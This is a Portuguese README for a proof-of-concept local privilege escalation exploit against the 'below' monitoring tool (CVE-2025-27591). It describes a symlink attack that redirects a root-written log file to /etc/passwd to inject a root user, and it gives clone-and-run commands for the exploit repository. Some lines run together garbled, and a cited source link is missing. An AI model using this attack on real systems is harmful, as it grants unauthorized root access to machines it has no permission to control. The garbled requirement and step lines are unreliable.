
Este é um exploit proof-of-concept (PoC) para CVE-2025-27591, uma vulnerabilidade de escalada de privilégio local na ferramenta de monitoramento de sistema below.
O problema decorre do tratamento inseguro de arquivos de log (/var/log/below/error_root.log) quando executado com privilégios elevados. Abusando disso, um atacante pode realizar um ataque de symlink e injetar um usuário malicioso em /etc/passwd, efetivamente concedendo acesso root.
/usr/bin/belowsudo para executar below record/var/log/below/error_root.log → /etc/passwdsudo /usr/bin/below record/etc/passwdgit clone https://github.com/Thekin-ctrl/CVE-2025-27591-Below.git
cd CVE-2025-27591-Below
python3 Exploit.py
Este exploit foi inspirado por um proof-of-concept anterior de BridgerAlderson, disponível aqui:
A versão atual é uma versão simplificada e adaptada escrita por mim para fins educacionais e de prática.